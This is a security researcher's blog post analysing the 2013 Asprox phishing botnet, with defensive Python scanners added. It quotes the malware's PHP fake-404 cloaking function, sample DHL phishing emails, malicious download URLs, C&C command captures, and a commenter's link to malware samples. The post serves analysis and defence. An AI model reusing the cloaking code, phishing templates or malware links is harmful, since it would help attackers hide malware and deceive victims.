Asprox Botnet 2013 - Phishing Malware As a Service

This blog post compiles findings on the Asprox botnet. The status described here mainly represents the state of the botnet in cca May-June 2013. For a description of the current state it is probably better to read some more recent posts from the history list of articles related to the Asprox botnet.

Asprox malware is being spread with phishing emails claiming to be from DHL/FedEx/USPS/American Airlines/Costco/Walmart/Pizza Hut/Home Depot/Target and many others. It also likes to claim to be a court order, a funeral/wedding announcement or a missed voicemail from WhatsApp.
I call this botnet Asprox based on the whitepaper from Trend Micro. Its architecture looks like an enterprise cloud-based service for building a botnet of infected hosts. The infrastructure has 2 visible load-balanced layers and at least 2 hidden inner layers.
It goes like this:

  1. Email distribution

    Phishing emails in this campaign seem to be sent mostly from hacked web servers.
  2. Phishing email

    January 2014: phishing for energy bills.
    December 2013 was a killing spree of many different phishing campaigns: Costco, BestBuy, Walmart, My CV, Adobe.
    September/October 2013 templates pretend to be wedding invitations or a voicemail from WhatsApp.

    May-July 2013 phishing emails direct the victims to follow a URL to "Get Shipment Info" or to enter the shipment number on a "Tracking Page" URL (DHL), to "Print Receipt" to receive the parcel (FedEx), to "Download It" to use the flight ticket (American Airlines) or to display the "Shipment Label" (UPS).

  3. Downloader sites

    Phishing emails point to compromised websites serving a ZIP file with a malicious executable = the Asprox downloader. At the beginning of May 2013 these sites tended to be mainly compromised Joomla 1.5 servers. At the end of May we saw quite a lot of websites hosted in the US, not necessarily Joomla related. The Asprox botnet, or the people behind it, probably use several exploits to compromise various PHP websites.
    Links from phishing emails lead to a malicious PHP script on the compromised websites. This PHP script proxies all the requests to another backend server (in 2013 there was 1 IP in Russia and a whole bulk of IP addresses in Germany), but there are definitely more such servers. In case of failure, suspicion or a reached request threshold the PHP script returns a fake "404 Not Found" error code.
  4. Download zipfile

    The victim downloads the zip file from the site; it contains an executable file, for example "Delivery Information.exe". The executable has the icon of a Word file to convince the victim to open/run it.

  5. The malware generated in the WhatsApp phishing campaign has the icon of a note to fool the victims into thinking it is a sound file.
  6. Execute the downloader

    When the victim executes the malware, it mimics something benign: Notepad is opened to show some bogus tracking information.

    The malware masquerades as a Windows binary (svchost.exe) to run hidden and undetected in the background.

    The exe file is removed and replaced with a TXT file.
  7. Command & Control center(s) - dozens of nginx proxies

    The malware contacts a round-robin list of C&Cs for commands and for downloading other malware. The list of IPs is hardcoded into the downloader binary. An updated list of C&Cs can be obtained from the C&C. The sites contacted are another farm of compromised web servers running nginx configured as a reverse proxy. All requests are proxied to a backend C&C server.
  8. Download other germs

    Other malware is then downloaded, executed and so on and so forth.
  9. Another layers???

    ... there are possibly more layers.

Interesting bits

These bits make it interesting:
  • Scale

    - The group seems to have been running this very same infrastructure for at least 1 year. New evasion features are added over time - like encrypting the requests. The campaign in May 2013 was, within 2 weeks, using dozens of compromised Joomla servers to serve the downloader malware. It is using dozens of servers (mostly compromised web servers) to send spam. And as of writing, the backend C&C is active on at least 34 IP addresses at once. If you consider that they probably have more to move on to and use once the current ones are closed, the scale is really like a small enterprise.
  • Evasion

    - malicious scripts on compromised download sites stop serving malware after some time and respond with a fake HTTP 404 Not Found response, probably to encourage less savvy admins to stay on the current vulnerable version, as it seems that the problem went away by itself. Similar evasion techniques are implemented on the C&C sites.
  • Automation

    - new obfuscated malware binaries for the downloader are generated at least twice a day. The FakeAV binaries downloaded from the C&C are automatically generated every 6 minutes. This ensures that samples at the time of execution are not known to your antivirus. For AV companies it usually takes 1-3 days to make a signature and propagate it for download by the client, and then more days until the victim bothers to update the antivirus signatures.
  • Cloud

    - availability of cheap cloud services allows the "throw-away" C&C to be hosted anywhere - especially when the host is a compromised server paid for by somebody else :). It is surprising that the 1st and 2nd layers of C&Cs are not hosted on some bullet-proof hosting in China or Ukraine, but in countries like France, United Kingdom, USA, Netherlands or Germany.

Chewy details

Email Distribution

Phishing Emails

Sample DHL:

If the links are not working, please move message to  "Inbox" folder.


   26.04.2013                                                                     PACK STATION     

DHL Ship Shipment Notification

On April 25, 2013 a shipment label was printed for delivery.

The shipment number of this package is 36085695.

To get additional info about this shipment use any of these options:

1) Click the following URL in your browser:

                  Get Shipment Info

2) Enter the shipment number on tracking page:

                  Tracking Page

For further assistance, please call DHL Customer Service.

For International Customer Service, please use official DHL site.


This message was created by DHL Ship, a product of DHL, at the request

of the sender. No authentication of email address has been performed.

  Deutsche Post DHL                    2013 DHL International GmbH. All rights reserved.   

Sample DHL Express:


2013-08-01 at 11:59
Shipment not delivered
Dear Customer, your package has arrived on August 1st, but messenger was unable to deliver the package to you, for more detailed information, please, download and read mailing label.
2013 DHL International GmbH. All rights reserved.

Downloader sites

The majority of the sites serving the malicious downloader file in the May campaign seem to be servers with Joomla 1.5.
The backend script serving the downloader imposes some limitations on the download of the malware:
  • limit of 4 downloads per IP - the number seems to be shared across the botnet infrastructure; this limitation probably keeps it low-profile from services like Google Badware
  • allow only certain User-Agents
  • probably some other filtering (geoip?, language?)
Once the limit is reached the malicious script generates a fake HTTP "404 Not Found" message. This way it probably avoids some malware analysis and it may also convince website managers not to check for and remove the malware - at first sight it seems that the problem disappeared by itself while the malicious script is still there and kicking. Versions of the script from August 2013 - January 2014 get the 404 message from the very same server to make it look real. The 404 message is taken from the URL http://this_server/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA. In the original response all occurrences of the called URI (AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA) are replaced with the current URI requested from the Asprox PHP proxy script to make the cloaking complete.

    function error_404(){
        header("HTTP/1.1 404 Not Found");
        // strip the query string from the URI the victim requested
        $uri=preg_replace("/(\?).*\$/","",$_SERVER["REQUEST_URI"]);
        // fetch a genuine 404 page from this very server (http_request() is the script's own helper)
        $content=http_request("http://".$_SERVER["SERVER_NAME"]."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
        // make the server's own 404 page refer to the requested URI
        $content=str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA",$uri,$content);
        exit($content);
    }

Older versions (until August 2013) were using a static page, which made it possible to fingerprint the proxy script:

    $ curl http://www.into-focus.de/templates/system/onlines.php?get_info=4_36160170
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head><title>404 Not Found</title></head><body>
    <h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>
    <hr>
    </body></html>

Rendered in a browser it looks like an ordinary 404 Not Found page:

    Not Found

    The requested URL was not found on this server.
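The cloaking function above gives a defender something concrete to hunt for on a web server. The following Python scanner is an added example, not code from the post or from any Asprox sample: it walks a web root, reads every PHP file and reports files that either contain the AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA token from the August 2013 - January 2014 versions, or combine the same behaviours without the token (fake 404 header, a fetch from the server's own host name, stripping the query string off REQUEST_URI and substituting the result into the fetched page). The PHP files it writes into a temporary directory are constructed here from the function quoted above; the regexes, verdict names and the benign CMS sample are my own.

```python
"""Hunt for the Asprox proxy script's fake-404 cloaking in a web root.
Added example (not code from the post); patterns and verdict names are my own."""
import os
import re
import tempfile

# Path token fetched from the compromised host by the Aug 2013 - Jan 2014 versions (from the post).
CLOAK_TOKEN = "AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA"

# Behavioural fingerprint of error_404(): fake 404 status, fetch from own host name,
# strip the query string off REQUEST_URI, and substitute it into the fetched page.
PATTERNS = {
    "fake_404_header": re.compile(r"""header\s*\(\s*["']HTTP/1\.[01]\s+404"""),
    "self_fetch": re.compile(r"""\$_SERVER\s*\[\s*["']SERVER_NAME["']\s*\]"""),
    "request_uri_strip": re.compile(r"""preg_replace\s*\([^;]*\$_SERVER\s*\[\s*["']REQUEST_URI"""),
    "uri_substitute": re.compile(r"str_replace\s*\("),
}


def scan_php_source(src: str) -> dict:
    """Return which fingerprint elements occur in one PHP source text."""
    hits = {name: bool(rx.search(src)) for name, rx in PATTERNS.items()}
    hits["cloak_token"] = CLOAK_TOKEN in src
    return hits


def classify(hits: dict) -> str:
    """Verdict: the exact token is strong evidence; the behaviour alone is a weaker signal."""
    if hits["cloak_token"]:
        return "asprox-proxy-cloak"
    if all(hits[name] for name in PATTERNS):
        return "suspect-404-cloak"   # same trick, token changed
    return "clean"


def scan_webroot(root: str) -> list:
    """Walk ROOT and return sorted (relative path, verdict) pairs for non-clean PHP files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                verdict = classify(scan_php_source(fh.read()))
            if verdict != "clean":
                findings.append((os.path.relpath(path, root).replace(os.sep, "/"), verdict))
    return sorted(findings)


# Constructed sample: the error_404() function quoted in the post, wrapped in a PHP file.
MALICIOUS_PHP = r'''<?php
function error_404(){
  header("HTTP/1.1 404 Not Found");
  $uri=preg_replace("/(\?).*\$/","",$_SERVER["REQUEST_URI"]);
  $content=http_request("http://".$_SERVER["SERVER_NAME"]."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
  $content=str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA",$uri,$content);
  exit($content);
}
'''
# Constructed variant with the token swapped out: only the behaviour remains.
VARIANT_PHP = MALICIOUS_PHP.replace(CLOAK_TOKEN, "zq8PlaceholderPathForVariant")
# Constructed benign file: a CMS sending a genuine 404 must not be flagged.
BENIGN_PHP = '''<?php
if (!route_exists($_SERVER["REQUEST_URI"])) {
  header("HTTP/1.1 404 Not Found");
  include "templates/404.php";
}
'''


def demo() -> list:
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "templates/system/onlines.php": MALICIOUS_PHP,  # file name from the post's curl example
            "img/get.php": VARIANT_PHP,                     # path style of the post's download sites
            "index.php": BENIGN_PHP,
        }
        for rel, src in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(src)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, verdict in demo():
        print(f"{verdict:20} {rel}")
```

Point scan_webroot() at the document root of a suspected host; a "suspect-404-cloak" hit deserves a manual look because the behavioural rule can also fire on a hand-written 404 handler that happens to fetch a page from its own host.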

The download sites are being reused at the same time for different phishing campaigns and they serve different malware binaries based on the type of the request.

Request           Campaign            Sample URL                                         Name of exe
?ticket=          American Airlines   http://andiburns.de/img/get.php?ticket=ss00_323    Electronic Ticket.exe
?i_info=          FedEx               http://andiburns.de/img/get.php?i_info=ss00_323    Shipment Label.exe
?receipt=         FedEx               http://andiburns.de/img/get.php?receipt=ss00_323   Postal Receipt No00843412843.exe
?receipt_print=   FedEx               http://andiburns.de/img/get.php?receipt=ss00_323   Postal Receipt No00843412843.exe
?print=           FedEx               http://andiburns.de/img/get.php?receipt=ss00_323   Postal Receipt No00843412843.exe

List of active download sites - last updated 2013-06-05 and largely outdated - kept here just as a sample.

Status     URL                                                                 IP              Country
active     http://s350098153.onlinehome.us/img/get.php?info=882_734823154                      US
active     http://tradeline.in.ua/img/get.php?info=833_1616925145                              RU
active     http://www.calanss.com/img/get.php?info=870_538703202                               US
active     http://stevenseagal.com/img/get.php?info=885_3137019897.74.215.39                   US
infected   http://aptekapanacea.ru/images/index.php?get_info=ss00_323          89.232.139.17   RU
infected   http://bdvi-lsa.de/templates/rssgets.php?get_info=ss00_323          85.214.40.177   DE

A sample of the PHP script can be found on this forum. It forwards the requests to some backend server together with information about the IP of the connecting client (taken from proxy headers if possible).

Asprox Downloader

The downloader encrypts the requests with RC4 (see more info in the analysis from Trend Micro). The encrypted request is passed to the second layer of C&C. The IP addresses of the C&Cs are hardcoded into the downloader binary. The request contains an MD5 hash as identification of the victim computer and some action.

Request gate for work

Id is the MD5 hash identifying the victim machine. The gate responds with a command for the downloader. So far I have seen 3 commands sent to the downloader - rdl, run, idl. According to the analysis from Trend Micro there are more commands. The gate is quite picky about the format of the request - probably to keep a low profile against automated probes from anti-malware sites. If you perform the request using an ordinary browser or a command like wget, you will most likely obtain only HTTP 404 Not Found.
  1. rdl

    - run dll. According to Trend Micro the DLL is encrypted with RC4. After download it is injected into the svchost.exe running the downloader and executed.

    GET  HTTP/1.0
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host:

    HTTP/1.1 200 OK
    Server: nginx/1.2.6
    Date: Fri, 24 May 2013 18:37:17 GMT
    Content-Type: text/html
    Content-Length: 86
    Connection: close
    X-Powered-By: PHP/5.4.4-7
    Vary: Accept-Encoding

    c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2

    GET  HTTP/1.0
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host:

    HTTP/1.1 200 OK
    Server: nginx/1.2.6
    Date: Fri, 24 May 18:37:19 GMT
    Content-Type: text/html
    Content-Length: 86
    Connection: close
    X-Powered-By: PHP/5.4.4-7
    Vary: Accept-Encoding

    c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84e
  2. run

    - run executable - from 27-Apr-2013 until 22-05-2013 I have seen only e3943d7369aa6add911aca18b3a507f4.exe, which is some rogue antivirus. Checking the reports on VirusTotal/ThreatExpert there are links to other exe files as well. Since 23-May-2013 the C&Cs are serving a5347c1b5b4aa9bd13d76736eb57c67f.exe, 6b761f91b02f89f9e695d4b5a87806de.exe and b2f7e9141eb124ce3152352c5df520f7.exe. So far I do not know what the hash filename stands for.

    GET  HTTP/1.0
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host:

    HTTP/1.1 200 OK
    Server: nginx/1.2.6
    Date: Fri, 24 May 2013 18:37:20 GMT
    Content-Type: text/html
    Content-Length: 86
    Connection: close
    X-Powered-By: PHP/5.4.4-7
    Vary: Accept-Encoding

    c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2
  3. idl

    - sleep 1 second

    GET  HTTP/1.0
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host:

    HTTP/1.1 200 OK
    Server: nginx/1.2.6
    Date: Fri, 24 May 2013 18:37:22 GMT
    Content-Type: text/html
    Content-Length: 86
    Connection: close
    X-Powered-By: PHP/5.4.4-7
    Vary: Accept-Encoding

    c=idl
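The response bodies in the three exchanges above are plain key=value strings, so an analyst capturing gate traffic in a sandbox can decode them automatically. The following Python is an added example, not code from the post or from any Asprox analysis tool: it parses captured gate response bodies into the command, payload path and checksum worth recording, and treats the fake 404 HTML page that the gate sends to browsers and wget as "not a command". The c=run body is constructed here on the assumption that run uses the same field layout as rdl (the post shows no run body, so its crc is a placeholder); the meaning of the a, k and n fields is not given in the post and they are passed through unchanged.

```python
"""Decode Asprox gate responses (c=rdl / c=run / c=idl) into analyst-readable
indicators. Added example, not code from the post; field meanings beyond c, u
and crc are not documented in the post and are passed through untouched."""
import re
from urllib.parse import parse_qsl

MD5_SHAPED = re.compile(r"^[0-9a-f]{32}$")

# Commands observed in the post, with the behaviour it describes for each.
KNOWN_COMMANDS = {
    "rdl": "download RC4-encrypted DLL and inject it into the svchost.exe running the downloader",
    "run": "download and execute an EXE (FakeAV in the 2013 samples)",
    "idl": "idle: sleep and ask again",
}


def parse_gate_response(body: str):
    """Return a dict describing one gate response, or None if BODY is not a command
    (the gate answers browsers and wget with a fake 404 HTML page instead)."""
    body = body.strip()
    if not body or body.startswith("<"):
        return None
    try:
        fields = dict(parse_qsl(body, keep_blank_values=True, strict_parsing=True))
    except ValueError:          # not key=value pairs at all
        return None
    cmd = fields.get("c")
    if cmd is None:
        return None
    info = {
        "command": cmd,
        "description": KNOWN_COMMANDS.get(cmd, "not seen in the post"),
        "fields": fields,       # a, k, n and anything else, untouched
    }
    path = fields.get("u")
    if path:
        name = path.rsplit("/", 1)[-1]
        info["payload_path"] = path
        info["payload_name"] = name
        # The post: DLLs arrive with a .crp extension and high entropy, EXEs as plain files.
        if ".crp" in name:
            info["payload_kind"] = "encrypted-dll"
        elif name.lower().endswith(".exe"):
            info["payload_kind"] = "exe"
        else:
            info["payload_kind"] = "unknown"
    crc = fields.get("crc")
    if crc is not None:
        info["crc_is_md5_shaped"] = bool(MD5_SHAPED.match(crc))
    return info


def extract_payload_paths(bodies) -> list:
    """Sorted, de-duplicated payload paths from a batch of captured response bodies."""
    paths = set()
    for body in bodies:
        info = parse_gate_response(body)
        if info and "payload_path" in info:
            paths.add(info["payload_path"])
    return sorted(paths)


# The three bodies quoted in the post, plus one constructed run response that reuses
# the post's FakeAV file name (placeholder crc), plus the fake 404 a browser would get.
CAPTURED = [
    "c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2",
    "c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84e",
    "c=idl",
    "c=run&u=/get/e3943d7369aa6add911aca18b3a507f4.exe&crc=00000000000000000000000000000000",  # constructed
    "<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>",  # fake 404
]

if __name__ == "__main__":
    for body in CAPTURED:
        print(parse_gate_response(body))
    print(extract_payload_paths(CAPTURED))
```

The payload paths are relative to whichever nginx proxy answered, so pair each path with the proxy IP it was fetched from when turning the output into blocklist entries.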

Request Gate for the list of IPS

Id in this case is not the whole MACHINEID (MD5 identification of the victim), but just the first 8 characters of it. For example:

    GET
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host:

The response is the RC4-encrypted list of IPs of the 3rd-layer C&Cs to contact.

Command & Control center(s)

The current list of active C&C sites is available from the Asprox tracker.

Download other germs

Files are downloaded as exe (plain exe file to be executed) or as dll. The DLLs have the extension .crp and seem to have very high entropy, which means they are either compressed or encrypted. More analysis of the downloader is needed to determine what happens with the dll files after downloading.

So far I have identified these files that can be downloaded as DLL modules: Corpus of Asprox Modules

In 2013 Asprox was involved in the distribution of FakeAV - a new malware file (for example /get/e3943d7369aa6add911aca18b3a507f4.exe) was generated once every 6 minutes. It takes some scheduled job another 6 minutes of delay to deliver it to the C&C servers. Here are samples for just one day - just to give you an idea how much your antivirus will protect you against this threat. At the time of generation it is usually found as malicious only by cca 2-3 out of 46 antivirus vendors at VirusTotal = most probably it won't be detected by your antivirus at the time of first execution:

    [list of 457 numbered sample links for that one day, not reproduced here]
This exe file - FakeAV - is a rogue antivirus. Once executed it reports itself to a registration site in Hong Kong:


  1. Sample of PHP on compromised Joomla 1.5 server.

  2. Another sample of malicious PHP scripts on compromised Joomla server.

  3. What do I do if I have become a victim of this?

  4. Hi Rebus,

    Nice post. I ran into the same threat this week. So it might be helpful to share it here.

    We got new ones yesterday, spreads FakeAV; CnC is a week old, up & alive.
    sample of this Kuluoz (asproxy) and fake av downloaded by it: http://www.mediafire.com/?efldm0wwpdfajry

    And before above case (different CnC, also up and alive)
    and also these:

    Keep on the good work
    #MalwareMustDie! www.malwaremustdie.org
    @unixfreaxjp (twitter)

  5. Search for the latest binaries of Asprox downloader trojan on:
    https://malwr.com/analysis/search/ - searching for tag:asprox

    https://www.virustotal.com/en/search/ - search for #asprox or #kuluoz

    Michal Ambroz

  6. I have received a number of these emails, and although I have not opened them-they were unidentified and too suspicious-it is the first time I am researching it more comprehensively.

    I just want to thank you and all the anti malware crowd (especially if voluntary!) for your work and information provided to the world at large!

  7. Hey there,

    one of my clients is getting re-infected almost daily. We're using Typo3 4.6.18 (will upgrade now to 4.7) with up-to-date plugins. I've seen that you requested the URLs to the CC in a different forum, here are mine: The virus also created multiple files: main.php, mirror.php, voice.php, message/.htaccess, message/info.php

  8. Hi. My webhost informed me that a website I manage for one of my clients has had two folders created on it - one called "news" and one called "messages". Within each of these folders were 2 files. The files were .htaccess with the following code

    RewriteEngine On
    # Turn on the rewriting engine

    RewriteRule .*/.* info.php?$0

    and another file called info.php with about 200 lines of php code, which includes a link to the following address

    I don't know how someone got access to the webspace to upload these files. (my hosting company is Strato)

    I have deleted the folders and files, but am concerned as to how they got there in the first place and whoever put them there will do it again.

    Can anyone help me please?


    1. Hey Joel,

      after a few days upgrading my client's homepage the files still were being created daily. Two days later some other site which hasn't been in use since 2003 also got hacked. Seems like the FTP passwords were hacked by a keylogger or something like that. Just changed all my passwords and since then nothing happened again.
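The two reader reports above share one on-disk indicator: a dropped .htaccess whose RewriteRule funnels every request into a freshly uploaded PHP file (info.php?$0, with main.php, mirror.php and voice.php alongside). The following Python is an added example, not the post's or the commenters' code: it parses .htaccess text and flags catch-all rewrites whose target is a PHP file other than the site's expected front controller, so a legitimate WordPress/Joomla style "RewriteRule . /index.php [L]" is not reported. The two .htaccess samples are constructed here from the rule quoted in comment 8 and from a typical WordPress configuration; the allow-list of front controllers is my assumption and should be adjusted per site.

```python
"""Flag .htaccess rules that funnel every request into a dropped PHP file.
Added example, not the post's or the commenters' code; the front-controller
allow-list is my assumption."""
import os
import re

REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
# Patterns that match (almost) any request path.
CATCH_ALL = {".", ".*", "^.*$", "(.*)", "^(.*)$", ".*/.*"}


def suspicious_rewrites(htaccess_text: str, front_controllers=("index.php",)) -> list:
    """Return one dict per RewriteRule that sends every request to a PHP target other
    than the site's known front controller; CMS rules like '. /index.php [L]' are skipped."""
    findings = []
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        m = REWRITE_RULE.match(line)
        if not m:
            continue
        pattern, target, flags = m.group(1), m.group(2), m.group(3) or ""
        target_file = target.split("?", 1)[0].lstrip("/")
        if pattern not in CATCH_ALL or not target_file.lower().endswith(".php"):
            continue
        if os.path.basename(target_file).lower() in front_controllers:
            continue
        findings.append({
            "line": lineno,
            "pattern": pattern,
            "target": target,
            "flags": flags,
            # $0 / $1 hands the full original path to the script, as in comment 8's rule
            "forwards_request_path": "$0" in target or "$1" in target,
        })
    return findings


# Constructed sample: the rule from comment 8, as dropped into news/ and messages/.
DROPPED_HTACCESS = """RewriteEngine On
# Turn on the rewriting engine
RewriteRule .*/.* info.php?$0
"""

# Constructed sample: a normal WordPress front-controller rule, which must not be flagged.
WORDPRESS_HTACCESS = """RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

if __name__ == "__main__":
    for label, text in (("dropped", DROPPED_HTACCESS), ("wordpress", WORDPRESS_HTACCESS)):
        print(label, suspicious_rewrites(text))
```

Run it over every .htaccess found under the web root (including subdirectories the CMS never created, like the news/ and messages/ folders reported above); a hit plus an unfamiliar PHP file next to it is the pattern both commenters describe.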


  9. New malvertising campaigns dressed as Walmart and BestBuy and My CV and Adobe License and some court-related stuff and CostCo

    Strings found in obfuscated binary:

    Asprox has changed the encryption scheme again. Requests from the downloader to C&C backends look like this:

    POST HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
    Content-Length: 316
    Pragma: no-cache

    <80>^@^@^@ESCn0ā^R^G/...binary garbage

  10. Name of Brian Krebs misused by the most recent sample of the Asprox downloader.

  11. BadwareBusters just ignoring the issue of not listing the download sites:

  12. Asprox downloader on a hacked server - http://forums.modx.com/thread/91776/hacked-site-lang-php-and-assets-images-logo-php